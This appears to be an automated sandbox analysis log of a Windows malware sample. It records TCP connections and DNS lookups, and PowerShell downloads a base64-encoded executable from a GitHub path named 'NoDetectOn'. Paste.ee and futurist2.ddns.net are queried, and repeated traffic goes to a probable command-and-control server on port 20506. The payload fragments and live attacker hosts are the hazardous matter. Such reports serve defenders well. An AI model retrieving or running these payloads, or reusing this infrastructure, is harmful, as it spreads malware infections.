                                                                                                    Oct 7, 2024 08:56:29.017162085 CEST4971020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:29.021992922 CEST205064971093.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:39.837120056 CEST4971020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:39.842144012 CEST205064971093.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:44.067133904 CEST205064971093.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:44.067245960 CEST4971020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:46.137247086 CEST4971020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:46.139580011 CEST4971120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:46.142138958 CEST205064971093.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:46.144417048 CEST205064971193.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:46.144525051 CEST4971120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:46.559820890 CEST4971120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:46.564675093 CEST205064971193.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:48.603346109 CEST205064971193.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:48.603456974 CEST4971120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:49.877957106 CEST49704443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:49.882744074 CEST4434970423.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:49.893280983 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:49.893320084 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:49.893377066 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:50.004781961 CEST4970380192.168.2.8199.232.210.172
                                                                                                    Oct 7, 2024 08:56:50.009939909 CEST8049703199.232.210.172192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.010037899 CEST4970380192.168.2.8199.232.210.172
                                                                                                    Oct 7, 2024 08:56:50.215133905 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:50.215164900 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.794356108 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.794430017 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:50.813021898 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:50.813038111 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.813271046 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.813324928 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:50.814261913 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:50.814287901 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.814579964 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:50.855411053 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.941236973 CEST4971120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:50.943646908 CEST4971320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:50.946234941 CEST205064971193.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.948708057 CEST205064971393.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:50.948791027 CEST4971320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:50.978699923 CEST4971320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:50.983630896 CEST205064971393.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:51.055603027 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:51.055669069 CEST4434971223.206.229.226192.168.2.8
                                                                                                    Oct 7, 2024 08:56:51.055670977 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:51.055732965 CEST49712443192.168.2.823.206.229.226
                                                                                                    Oct 7, 2024 08:56:53.637053967 CEST205064971393.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:53.637269020 CEST4971320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:54.285269022 CEST4971320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:54.287271976 CEST4971420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:54.290060043 CEST205064971393.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:54.292159081 CEST205064971493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:56:54.292244911 CEST4971420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:54.308593035 CEST4971420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:56:54.313433886 CEST205064971493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:02.286714077 CEST205064971493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:02.286803961 CEST4971420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:02.623441935 CEST4971420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:02.628267050 CEST205064971493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:02.653601885 CEST4971620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:02.658473015 CEST205064971693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:02.658561945 CEST4971620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:02.990778923 CEST4971620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:02.995677948 CEST205064971693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:05.447694063 CEST205064971693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:05.447952032 CEST4971620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:06.238334894 CEST4971620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:06.240330935 CEST4971720506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:06.244004011 CEST205064971693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:06.246140957 CEST205064971793.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:06.246232986 CEST4971720506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:06.264875889 CEST4971720506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:06.270325899 CEST205064971793.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:09.140912056 CEST205064971793.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:09.141010046 CEST4971720506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:10.425596952 CEST4971720506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:10.427088022 CEST4971820506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:10.430571079 CEST205064971793.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:10.431952000 CEST205064971893.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:10.432034969 CEST4971820506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:10.448117018 CEST4971820506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:10.453066111 CEST205064971893.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:13.480159044 CEST205064971893.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:13.480285883 CEST4971820506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:13.488518953 CEST4971820506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:13.490480900 CEST4971920506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:13.493488073 CEST205064971893.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:13.495445013 CEST205064971993.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:13.495507956 CEST4971920506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:13.513586044 CEST4971920506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:13.518475056 CEST205064971993.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:16.350686073 CEST205064971993.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:16.350779057 CEST4971920506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:17.470638037 CEST4971920506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:17.475590944 CEST205064971993.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:17.513294935 CEST4972020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:17.518516064 CEST205064972093.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:17.518619061 CEST4972020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:17.579844952 CEST4972020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:17.584744930 CEST205064972093.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:20.539962053 CEST205064972093.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:20.540106058 CEST4972020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:20.753746033 CEST4972020506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:20.754966021 CEST4972120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:20.758831024 CEST205064972093.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:20.759928942 CEST205064972193.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:20.760016918 CEST4972120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:20.775954962 CEST4972120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:20.780905962 CEST205064972193.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:23.701423883 CEST205064972193.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:23.701509953 CEST4972120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:24.363065958 CEST4972120506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:24.364392042 CEST4972220506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:24.368030071 CEST205064972193.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:24.369291067 CEST205064972293.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:24.369376898 CEST4972220506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:24.384510040 CEST4972220506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:24.389481068 CEST205064972293.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:27.144933939 CEST205064972293.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:27.144995928 CEST4972220506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:27.425764084 CEST4972220506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:27.426995039 CEST4972320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:27.430704117 CEST205064972293.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:27.434672117 CEST205064972393.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:27.434762955 CEST4972320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:27.451409101 CEST4972320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:27.456351042 CEST205064972393.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:27.486377001 CEST4434970513.107.246.45192.168.2.8
                                                                                                    Oct 7, 2024 08:57:27.486402035 CEST4434970513.107.246.45192.168.2.8
                                                                                                    Oct 7, 2024 08:57:27.486505032 CEST49705443192.168.2.813.107.246.45
                                                                                                    Oct 7, 2024 08:57:27.487624884 CEST49705443192.168.2.813.107.246.45
                                                                                                    Oct 7, 2024 08:57:27.492469072 CEST4434970513.107.246.45192.168.2.8
                                                                                                    Oct 7, 2024 08:57:30.549489021 CEST205064972393.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:30.549599886 CEST4972320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:30.550776958 CEST4972320506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:30.558995962 CEST205064972393.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:30.564033985 CEST4972420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:30.568842888 CEST205064972493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:30.568908930 CEST4972420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:30.589585066 CEST4972420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:30.594487906 CEST205064972493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:44.425940037 CEST4972420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:44.430841923 CEST205064972493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:45.082685947 CEST205064972493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:45.082847118 CEST4972420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:48.113333941 CEST4972420506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:48.116122007 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:48.118210077 CEST205064972493.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:48.121196985 CEST205064972593.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:48.121272087 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:48.158277988 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:48.163327932 CEST205064972593.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:48.223217010 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:48.228115082 CEST205064972593.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:48.238709927 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:48.243707895 CEST205064972593.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:48.348741055 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:48.353708029 CEST205064972593.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:49.704694986 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:49.709991932 CEST205064972593.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:50.656795025 CEST205064972593.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:50.656855106 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:53.472685099 CEST4972520506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:53.474821091 CEST4972620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:53.477663994 CEST205064972593.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:53.479757071 CEST205064972693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:53.479914904 CEST4972620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:53.587028027 CEST4972620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:53.592019081 CEST205064972693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:53.816838026 CEST4972620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:57:53.821734905 CEST205064972693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:56.408864021 CEST205064972693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:57:56.408958912 CEST4972620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:58:00.585118055 CEST4972620506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:58:00.589762926 CEST4973220506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:58:00.591068029 CEST205064972693.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:58:00.595756054 CEST205064973293.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:58:00.595835924 CEST4973220506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:58:03.121788979 CEST205064973293.123.39.76192.168.2.8
                                                                                                    Oct 7, 2024 08:58:03.121881008 CEST4973220506192.168.2.893.123.39.76
                                                                                                    Oct 7, 2024 08:58:03.649408102 CEST4973220506192.168.2.893.123.39.76
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 7, 2024 08:56:19.932950974 CEST5750953192.168.2.81.1.1.1
                                                                                                    Oct 7, 2024 08:56:19.939723015 CEST53575091.1.1.1192.168.2.8
                                                                                                    Oct 7, 2024 08:56:22.954859018 CEST5602253192.168.2.81.1.1.1
                                                                                                    Oct 7, 2024 08:56:22.963660002 CEST53560221.1.1.1192.168.2.8
                                                                                                    Oct 7, 2024 08:56:28.882441044 CEST6436653192.168.2.81.1.1.1
                                                                                                    Oct 7, 2024 08:56:28.890786886 CEST53643661.1.1.1192.168.2.8
                                                                                                    Oct 7, 2024 08:57:30.552371979 CEST6072453192.168.2.81.1.1.1
                                                                                                    Oct 7, 2024 08:57:30.563051939 CEST53607241.1.1.1192.168.2.8
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 7, 2024 08:56:19.932950974 CEST192.168.2.81.1.1.10x42b7Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:22.954859018 CEST192.168.2.81.1.1.10x8408Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:28.882441044 CEST192.168.2.81.1.1.10x7bd1Standard query (0)futurist2.ddns.netA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:57:30.552371979 CEST192.168.2.81.1.1.10xb67fStandard query (0)futurist2.ddns.netA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 7, 2024 08:56:19.403553963 CEST1.1.1.1192.168.2.80x9b49No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:19.403553963 CEST1.1.1.1192.168.2.80x9b49No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:19.939723015 CEST1.1.1.1192.168.2.80x42b7No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:19.939723015 CEST1.1.1.1192.168.2.80x42b7No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:19.939723015 CEST1.1.1.1192.168.2.80x42b7No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:19.939723015 CEST1.1.1.1192.168.2.80x42b7No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:22.963660002 CEST1.1.1.1192.168.2.80x8408No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:22.963660002 CEST1.1.1.1192.168.2.80x8408No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:56:28.890786886 CEST1.1.1.1192.168.2.80x7bd1No error (0)futurist2.ddns.net93.123.39.76A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 08:57:30.563051939 CEST1.1.1.1192.168.2.80xb67fNo error (0)futurist2.ddns.net93.123.39.76A (IP address)IN (0x0001)false
                                                                                                    • raw.githubusercontent.com
                                                                                                    • paste.ee
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.849708185.199.108.1334437600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-07 06:56:20 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                    Host: raw.githubusercontent.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-07 06:56:20 UTC903INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 2935468
                                                                                                    Cache-Control: max-age=300
                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-Frame-Options: deny
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    X-GitHub-Request-Id: 4619:1531AA:B178E9:C23C97:67036E4F
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Mon, 07 Oct 2024 06:56:20 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740058-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1728284181.666755,VS0,VE1
                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    X-Fastly-Request-ID: e80ae78850fc4abe220499eadff362c3f86424a8
                                                                                                    Expires: Mon, 07 Oct 2024 07:01:20 GMT
                                                                                                    Source-Age: 257
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                    Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                    Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                    Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                    2024-10-07 06:56:20 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                    Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
